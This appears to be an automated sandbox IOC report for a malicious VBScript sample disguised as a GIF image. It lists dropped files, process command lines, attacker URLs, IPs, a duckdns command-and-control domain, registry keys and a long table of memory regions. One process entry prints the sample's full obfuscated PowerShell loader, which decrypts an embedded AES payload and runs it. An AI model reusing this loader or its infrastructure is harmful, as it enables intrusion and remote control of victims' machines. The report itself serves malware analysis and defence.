IOC Report
createactiveimagesbeautygirlfrnd.gIF.vbs

loading gif

Files

File Path
Type
Category
Malicious
createactiveimagesbeautygirlfrnd.gIF.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dsftexbx.hx4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fig4okvo.32s.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
2024remcmon.duckdns.org
malicious
http://geoplugin.net/json.gp
178.237.33.50
http://nuget.org/NuGet.exe
unknown
http://198.46.176.133/Upload/vbs.jpeg
198.46.176.133
http://schemas.m0L
unknown
http://geoplugin.net/
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://geoplugin.net/json.gp/C
unknown
http://geoplugin.net/json.gpl
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://192.3.176.154/xampp/glo/KBV.txt
192.3.176.154
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://geoplugin.net/json.gpw
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
http://192.3.176.154
unknown
http://198.46.176.133
unknown
http://geoplugin.net/json.gpSystem32
unknown
There are 12 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
2024remcmon.duckdns.org
192.210.214.9
malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
192.210.214.9
2024remcmon.duckdns.org
United States
malicious
192.3.176.154
unknown
United States
198.46.176.133
unknown
United States
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-R2I0JW
exepath
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-R2I0JW
licence
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-R2I0JW
time
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
246335CF000
trusted library allocation
page read and write
malicious
122B000
heap
page read and write
malicious
246343D8000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
2463B914000
heap
page read and write
7FFAACD70000
trusted library allocation
page execute and read and write
2463B8C1000
heap
page read and write
1C7DAF5C000
heap
page read and write
FC3473F000
stack
page read and write
1C7DABF1000
heap
page read and write
2463B720000
heap
page execute and read and write
24621915000
heap
page read and write
1C7DADC0000
heap
page read and write
7FFAACEF0000
trusted library allocation
page read and write
1C7DAD0C000
heap
page read and write
1C7DAD62000
heap
page read and write
246338B8000
trusted library allocation
page read and write
7FFB1E3C5000
unkown
page readonly
1C7DAEF0000
heap
page read and write
24621880000
heap
page readonly
246216E4000
heap
page read and write
FC34436000
stack
page read and write
24621733000
heap
page read and write
246217D0000
heap
page read and write
246235C1000
trusted library allocation
page read and write
7FFAACEB0000
trusted library allocation
page read and write
1C7D8F95000
heap
page read and write
246217B5000
heap
page read and write
246335C1000
trusted library allocation
page read and write
246217C0000
heap
page read and write
1C7DB0A0000
heap
page read and write
2462171B000
heap
page read and write
1025000
heap
page read and write
7FFAACF5A000
trusted library allocation
page read and write
2462347C000
heap
page read and write
B8C000
stack
page read and write
1C7DAC16000
heap
page read and write
1C7DAC07000
heap
page read and write
246216F9000
heap
page read and write
2463B6C5000
heap
page read and write
7FFAACC50000
trusted library allocation
page read and write
12A3000
heap
page read and write
1C7DAF74000
heap
page read and write
1220000
heap
page read and write
1C7DACFD000
heap
page read and write
1C7D8D70000
heap
page read and write
1C7DABF6000
heap
page read and write
FC3463E000
stack
page read and write
1C7DAC58000
heap
page read and write
1C7DAD62000
heap
page read and write
1C7DAF81000
heap
page read and write
7FFAACBA3000
trusted library allocation
page execute and read and write
1C7DABFF000
heap
page read and write
1C7DAC53000
heap
page read and write
7FFB1E3B6000
unkown
page readonly
246216A0000
heap
page read and write
1C7DAC0D000
heap
page read and write
2463B65D000
heap
page read and write
1C7DABF6000
heap
page read and write
1C7DAC36000
heap
page read and write
7FFAACF00000
trusted library allocation
page read and write
7FFB1E3C2000
unkown
page readonly
7FFAACEE0000
trusted library allocation
page read and write
246216DB000
heap
page read and write
1C7DAF5F000
heap
page read and write
1C7DAF87000
heap
page read and write
FC3528D000
stack
page read and write
1C7DADC0000
heap
page read and write
10E0000
heap
page read and write
1C7D8DB2000
heap
page read and write
7FFAACF30000
trusted library allocation
page read and write
37BF000
stack
page read and write
7FFAACE90000
trusted library allocation
page read and write
24621870000
trusted library allocation
page read and write
24621800000
heap
page read and write
7FFAACEC0000
trusted library allocation
page read and write
7FFB1E3A1000
unkown
page execute read
1C7DAC17000
heap
page read and write
7FFAACD90000
trusted library allocation
page execute and read and write
128F000
heap
page read and write
FC340FE000
stack
page read and write
1C7DAC58000
heap
page read and write
FC341FE000
stack
page read and write
7FFAACED0000
trusted library allocation
page read and write
24626EBE000
trusted library allocation
page read and write
1C7DAC0D000
heap
page read and write
1C7DAD54000
heap
page read and write
7FFAACF41000
trusted library allocation
page read and write
1C7DAFD2000
heap
page read and write
7FFB1E3C5000
unkown
page readonly
24621890000
trusted library allocation
page read and write
478000
remote allocation
page execute and read and write
1C7DAFA3000
heap
page read and write
7FFAACE70000
trusted library allocation
page read and write
2462175A000
heap
page read and write
7FFB1E3B6000
unkown
page readonly
1000000
heap
page read and write
1C7DB001000
heap
page read and write
1C7DAC4B000
heap
page read and write
7FFAACF20000
trusted library allocation
page read and write
24633978000
trusted library allocation
page read and write
1C7DAC4E000
heap
page read and write
474000
remote allocation
page execute and read and write
7FFAACDD0000
trusted library allocation
page read and write
1C7DAEF1000
heap
page read and write
1C7DADC0000
heap
page read and write
FC34379000
stack
page read and write
350B000
stack
page read and write
7FFAACF10000
trusted library allocation
page read and write
1C7DAD45000
heap
page read and write
1ED54FE000
stack
page read and write
120D000
stack
page read and write
10C0000
heap
page read and write
7FFB1E3C0000
unkown
page read and write
24623642000
trusted library allocation
page read and write
2463B6B3000
heap
page read and write
7FFAACCC0000
trusted library allocation
page execute and read and write
1C7DAFD4000
heap
page read and write
1C7DAC57000
heap
page read and write
1C7D8D60000
heap
page read and write
7FFAACC5C000
trusted library allocation
page execute and read and write
24621713000
heap
page read and write
32CE000
stack
page read and write
246246BE000
trusted library allocation
page read and write
24621820000
heap
page read and write
1C7DAC58000
heap
page read and write
1C7DAFE1000
heap
page read and write
126C000
heap
page read and write
2463BCE0000
trusted library section
page read and write
7FFAACC60000
trusted library allocation
page execute and read and write
1C7DABFA000
heap
page read and write
1ED49E8000
stack
page read and write
FC347BC000
stack
page read and write
1C7DABFF000
heap
page read and write
1C7DAC42000
heap
page read and write
1C7DABF7000
heap
page read and write
1ED4CFE000
stack
page read and write
7FFAACE30000
trusted library allocation
page read and write
1C7DA750000
heap
page read and write
1ED56FB000
stack
page read and write
1C7DAC12000
heap
page read and write
37FE000
stack
page read and write
7DF41F050000
trusted library allocation
page execute and read and write
2CBF000
stack
page read and write
FC3518E000
stack
page read and write
7FFAACE40000
trusted library allocation
page read and write
FC346BE000
stack
page read and write
7FFB1E3A1000
unkown
page execute read
1C7DABFC000
heap
page read and write
1C7DAD3C000
heap
page read and write
10D0000
heap
page read and write
1C7DADC0000
heap
page read and write
1C7DAC17000
heap
page read and write
129E000
heap
page read and write
2463B692000
heap
page read and write
7FFAACEA0000
trusted library allocation
page read and write
FC33DFF000
stack
page read and write
1C7DAD29000
heap
page read and write
1C7DAC39000
heap
page read and write
7FFAACDF0000
trusted library allocation
page read and write
24625ABE000
trusted library allocation
page read and write
1C7DAD48000
heap
page read and write
FC345BE000
stack
page read and write
1C7DAC31000
heap
page read and write
1C7DABF5000
heap
page read and write
1C7DAE6C000
heap
page read and write
1C7D8F90000
heap
page read and write
1C7DAD39000
heap
page read and write
1ED50FF000
stack
page read and write
24621850000
trusted library allocation
page read and write
7FFAACD82000
trusted library allocation
page read and write
1C7DACF0000
heap
page read and write
38FF000
stack
page read and write
1C7DAF5A000
heap
page read and write
7FFAACE00000
trusted library allocation
page read and write
1C7DAD59000
heap
page read and write
7FFAACF60000
trusted library allocation
page read and write
1C7DAE6C000
heap
page read and write
2DFF000
stack
page read and write
7FFAACE50000
trusted library allocation
page read and write
1ED51FE000
stack
page read and write
1C7DABFF000
heap
page read and write
1C7DAC0C000
heap
page read and write
1C7DAD7A000
heap
page read and write
1C7D8DA0000
heap
page read and write
2463B62A000
heap
page read and write
1C7DACF1000
heap
page read and write
1C7DABF0000
heap
page read and write
FC3407E000
stack
page read and write
24623BB4000
trusted library allocation
page read and write
1C7D8F70000
heap
page read and write
1C7DAF59000
heap
page read and write
1C7DAC1E000
heap
page read and write
1C7DAF72000
heap
page read and write
1C7DADC0000
heap
page read and write
1C7DAC12000
heap
page read and write
24623B77000
trusted library allocation
page read and write
1C7DADC2000
heap
page read and write
FC3453B000
stack
page read and write
1C7DADC0000
heap
page read and write
354D000
stack
page read and write
7FFAACBAD000
trusted library allocation
page execute and read and write
2463BB90000
heap
page read and write
1C7DAF7D000
heap
page read and write
1C7DAF7C000
heap
page read and write
364E000
stack
page read and write
7FFAACE60000
trusted library allocation
page read and write
2463B726000
heap
page execute and read and write
1C7D8DA9000
heap
page read and write
1ED4EFE000
stack
page read and write
340D000
stack
page read and write
246237E4000
trusted library allocation
page read and write
7FFAACF64000
trusted library allocation
page read and write
7FFAACD60000
trusted library allocation
page execute and read and write
7FFAACE20000
trusted library allocation
page read and write
1C7DAD09000
heap
page read and write
1C7DAD6F000
heap
page read and write
24621761000
heap
page read and write
1C7DABFB000
heap
page read and write
2463B8F1000
heap
page read and write
24623437000
trusted library allocation
page read and write
24621824000
heap
page read and write
1C7DAF7B000
heap
page read and write
246264BE000
trusted library allocation
page read and write
24621721000
heap
page read and write
1C7DAD21000
heap
page read and write
7FFAACBA4000
trusted library allocation
page read and write
246218F0000
heap
page execute and read and write
246235B0000
heap
page read and write
7FFAACDA0000
trusted library allocation
page read and write
1C7DAC17000
heap
page read and write
2463B921000
heap
page read and write
1C7DAF78000
heap
page read and write
1C7DAD41000
heap
page read and write
1C7DAFA3000
heap
page read and write
1C7DAF79000
heap
page read and write
FC3427E000
stack
page read and write
1C7DAC58000
heap
page read and write
7FFAACE10000
trusted library allocation
page read and write
FC342FD000
stack
page read and write
1C7DAC2A000
heap
page read and write
1ED4DFE000
stack
page read and write
246216D0000
heap
page read and write
2CFE000
stack
page read and write
1C7DAC06000
heap
page read and write
246245C6000
trusted library allocation
page read and write
7FFAACDE0000
trusted library allocation
page read and write
FC3417C000
stack
page read and write
1C7DAFA3000
heap
page read and write
1C7DADC0000
heap
page read and write
1C7DABF8000
heap
page read and write
2463B8A0000
heap
page read and write
1ED55FE000
stack
page read and write
1C7DABF2000
heap
page read and write
246215C0000
heap
page read and write
1C7DABF6000
heap
page read and write
FC343BE000
stack
page read and write
1C7DAC19000
heap
page read and write
2463B911000
heap
page read and write
1C7DAC06000
heap
page read and write
24623A4E000
trusted library allocation
page read and write
1C7DABFB000
heap
page read and write
EFB000
stack
page read and write
1C7DB09F000
heap
page read and write
7FFB1E3C0000
unkown
page read and write
FC33D73000
stack
page read and write
1C7DADC0000
heap
page read and write
7FFAACBA0000
trusted library allocation
page read and write
1C7DAFB1000
heap
page read and write
24623590000
heap
page execute and read and write
1C7DAF85000
heap
page read and write
246217B2000
heap
page read and write
24623BC6000
trusted library allocation
page read and write
FC344B8000
stack
page read and write
36BE000
stack
page read and write
2463B7A0000
heap
page read and write
1C7DAD24000
heap
page read and write
1C7DABF2000
heap
page read and write
246339D8000
trusted library allocation
page read and write
FD0000
heap
page read and write
1C7DAC25000
heap
page read and write
7FFAACC86000
trusted library allocation
page execute and read and write
246338A9000
trusted library allocation
page read and write
24621910000
heap
page read and write
1C7DAC17000
heap
page read and write
7FFAACE80000
trusted library allocation
page read and write
1C7DABF4000
heap
page read and write
33CF000
stack
page read and write
1C7DAF5F000
heap
page read and write
1C7DB000000
heap
page read and write
2463B610000
heap
page read and write
1C7D8DDF000
heap
page read and write
7FFAACBB0000
trusted library allocation
page read and write
1C7DAD11000
heap
page read and write
7FFAACBBB000
trusted library allocation
page read and write
7FFAACD40000
trusted library allocation
page read and write
7FFAACF51000
trusted library allocation
page read and write
1C7DAD5A000
heap
page read and write
1C7DAD5F000
heap
page read and write
7FFAACDB0000
trusted library allocation
page read and write
7FFAACBA2000
trusted library allocation
page read and write
1ED53FD000
stack
page read and write
1C7DAD71000
heap
page read and write
1C7DAC02000
heap
page read and write
24623BBD000
trusted library allocation
page read and write
7FFAACDC0000
trusted library allocation
page read and write
2463B7C0000
heap
page read and write
24623400000
trusted library allocation
page read and write
FC3520E000
stack
page read and write
2463362F000
trusted library allocation
page read and write
2463B8EE000
heap
page read and write
BF0000
heap
page read and write
24623B99000
trusted library allocation
page read and write
24623430000
trusted library allocation
page read and write
7FFB1E3A0000
unkown
page readonly
7FFB1E3C2000
unkown
page readonly
1C7DAC58000
heap
page read and write
1C7D8E47000
heap
page read and write
1C7DAFB0000
heap
page read and write
7FFAACD51000
trusted library allocation
page read and write
7FFB1E3A0000
unkown
page readonly
7FFAACD5A000
trusted library allocation
page read and write
1020000
heap
page read and write
246250BE000
trusted library allocation
page read and write
1C7DAD51000
heap
page read and write
1C7DABFF000
heap
page read and write
1C7DAC3E000
heap
page read and write
7FFAACC56000
trusted library allocation
page read and write
1C7DAD76000
heap
page read and write
1C7DAC58000
heap
page read and write
1C7DAC19000
heap
page read and write
There are 321 hidden memdumps, click here to show them.